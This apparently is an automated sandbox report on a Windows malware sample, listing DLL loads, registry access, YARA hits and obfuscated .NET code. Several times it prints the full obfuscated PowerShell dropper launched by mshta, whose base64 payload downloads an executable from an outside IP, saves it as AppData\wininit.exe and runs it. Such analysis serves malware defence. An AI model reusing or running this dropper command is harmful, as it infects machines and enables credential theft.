            Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: wldp.dll
            Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: vaultcli.dll
            Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: wintypes.dll
            Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: profapi.dll
            Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: netapi32.dll
            Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: samcli.dll
            Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: samlib.dll
            Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: userenv.dll
            Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: dpapi.dll
            Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: mswsock.dll
            Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: dnsapi.dll
            Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: iphlpapi.dll
            Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
            Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb04P source: powershell.exe, 00000003.00000002.1704971500.0000000007B57000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1704660304.0000000007AD0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: $iq7C:\Users\user\AppData\Local\Temp\sg2bcrbf\sg2bcrbf.pdb source: powershell.exe, 00000001.00000002.1813801603.0000000004E57000.00000004.00000800.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Source: 6.2.wininit.exe.6db0000.5.raw.unpack, KQkH3in3AYxtB1JkcI.cs.Net Code: gHQexYK344 System.Reflection.Assembly.Load(byte[])
            Source: 6.2.wininit.exe.374d400.1.raw.unpack, KQkH3in3AYxtB1JkcI.cs.Net Code: gHQexYK344 System.Reflection.Assembly.Load(byte[])
            Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))"
            Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))"Jump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))"
            Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))"Jump to behavior
            Source: Yara matchFile source: 6.2.wininit.exe.3709200.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.wininit.exe.36ef1e0.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.wininit.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.wininit.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.wininit.exe.3709200.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.wininit.exe.36ef1e0.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.1797561748.0000000003709000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.1797561748.0000000003569000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2881298963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.1795089364.0000000002561000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wininit.exe PID: 4416, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: wininit.exe PID: 2668, type: MEMORYSTR
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sg2bcrbf\sg2bcrbf.cmdline"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sg2bcrbf\sg2bcrbf.cmdline"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04BB0C7F push eax; retn 0070h1_2_04BB0C8A
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04BB0C6F push eax; retn 0070h1_2_04BB0C7A
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04BB0C62 push eax; retn 0070h1_2_04BB0C6A
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04E516D2 push ss; retf 3_2_04E516D3
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04E55690 push eax; iretd 3_2_04E55699
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04E510E8 push eax; retn 0070h3_2_04E510F2
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04E510F8 push eax; retn 0070h3_2_04E51102
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04E510D1 push eax; retn 0070h3_2_04E510D2
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04E510D8 push eax; retn 0070h3_2_04E510E2
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04E51081 push eax; retn 0070h3_2_04E51082
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04E5108F push eax; retn 0070h3_2_04E51092
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_07D633B3 push FFFFFF8Bh; retf 3_2_07D633BC
            Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: 6_2_06668A88 pushfd ; retf 6_2_06668A89
            Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: 9_2_00402AC0 push eax; ret 9_2_00402AD4
            Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: 9_2_00402AC0 push eax; ret 9_2_00402AFC
            Source: caspol[1].exe.1.drStatic PE information: section name: .text entropy: 7.9227520273220895
            Source: wininit.exe.1.drStatic PE information: section name: .text entropy: 7.9227520273220895
            Source: 6.2.wininit.exe.6db0000.5.raw.unpack, KQkH3in3AYxtB1JkcI.csHigh entropy of concatenated method names: 'gwb8vauN76', 'coJ8KZpJSC', 'fZs8T6XHIb', 'uqG8CFeqcY', 'Xrh8GBbB4F', 'F5A8QvMX8N', 'Mhg8iMMyDK', 'IwJ8nhpBnt', 'ppo8rHM5l3', 'zKB8VcEgFn'
            Source: 6.2.wininit.exe.6db0000.5.raw.unpack, BDLA7ZzmjyZeMHspbI.csHigh entropy of concatenated method names: 'pYcc3qb4LP', 'iVMcFnRmTf', 'kjSch2OmFh', 'dPKcNtftA0', 'ep5cukejfW', 'DLtcmCOIuX', 'lWKctS9MXy', 'aH8c6uleZm', 'Py5cgNOThj', 'aoVcHMdwZP'
            Source: 6.2.wininit.exe.6db0000.5.raw.unpack, dhK9KbNqZASI81hGMI.csHigh entropy of concatenated method names: 'sfGQv3qveH', 'Gk1QTJCxla', 'PF0QGPZ0c9', 'ecJQiiiaj1', 'k6KQn6iR71', 'XSqGYjTQNd', 'dr0GDj07xW', 'z70GSox8Zc', 'UUbGWZII6b', 'n2XGkeHKAq'
            Source: 6.2.wininit.exe.6db0000.5.raw.unpack, eWbKPQURAh7q0dXmWQa.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'g6Ics1b5Q4', 'lHScanO8Hq', 'nGHc7Kj1b4', 'Nkvc4EEFTo', 'W1ncOKfXll', 'RBGc1YrhiV', 'W60cEbFZA3'
            Source: 6.2.wininit.exe.6db0000.5.raw.unpack, blpmsJDcqDTfApNEE9.csHigh entropy of concatenated method names: 'sXHIWBvUB1', 'gM3IXliyxi', 'LAkjRqtjrT', 'irsjUBXqk4', 'suWIscc6eO', 'adBIa4DbBY', 'bhgI7Ap3yt', 'JJPI44IQ2E', 'x1FIOfmaQo', 'J1LI18bvGD'
            Source: 6.2.wininit.exe.6db0000.5.raw.unpack, asC2VyhwMrPC2xZIhl.csHigh entropy of concatenated method names: 'ARKCb4vRER', 'PfqC3SbNpI', 'gFNCFAwu0h', 'N7QChL3WU5', 'egwCMgpiYw', 'gXBCZhOmb9', 'HiyCI68I54', 'NnfCj0kphm', 'uQfCdb2Dm9', 'VKQCcjYmRN'
            Source: 6.2.wininit.exe.6db0000.5.raw.unpack, rXxk4UXv0hG6nJr2r4.csHigh entropy of concatenated method names: 'NY8cCHPCTo', 'v1YcGMuL0j', 'PlDcQ98GnS', 'gHrci7Rn0Y', 'LTtcdZa6tk', 'WgxcnQGGAx', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 6.2.wininit.exe.6db0000.5.raw.unpack, wtca6eCuhSEXbwj87j.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'NPhBk6IATb', 'NUrBXV5rDr', 'w4vBzP3VTO', 'Fum8R26vkD', 'BSQ8UGxs3m', 'FAr8ByJM0s', 'KyD88tXy3T', 'HwpHMYNZUsK33x2B4cE'
            Source: 6.2.wininit.exe.6db0000.5.raw.unpack, Y1v65cTfYUkeaqQPAC.csHigh entropy of concatenated method names: 'Dispose', 'xaYUki41xL', 'hXyBuxl6Ko', 'sWJJotluKH', 'NwmUXu8WJh', 'n33Uzq0LEr', 'ProcessDialogKey', 'eg6BR76f1h', 'lmIBU3Lkqh', 'k4kBBdXxk4'
            Source: 6.2.wininit.exe.6db0000.5.raw.unpack, Urg7ubUUcCev0u1dT4r.csHigh entropy of concatenated method names: 'x1jcXgXCGN', 'fvScz1QqAG', 'XKdfRDMKeD', 'LkffUlITX0', 'gnrfBIBAS5', 'AUdf8iyEhN', 'OqwfeZeTlt', 'XAwfvt7blr', 'PnmfKyehow', 'jKVfTiMyVU'
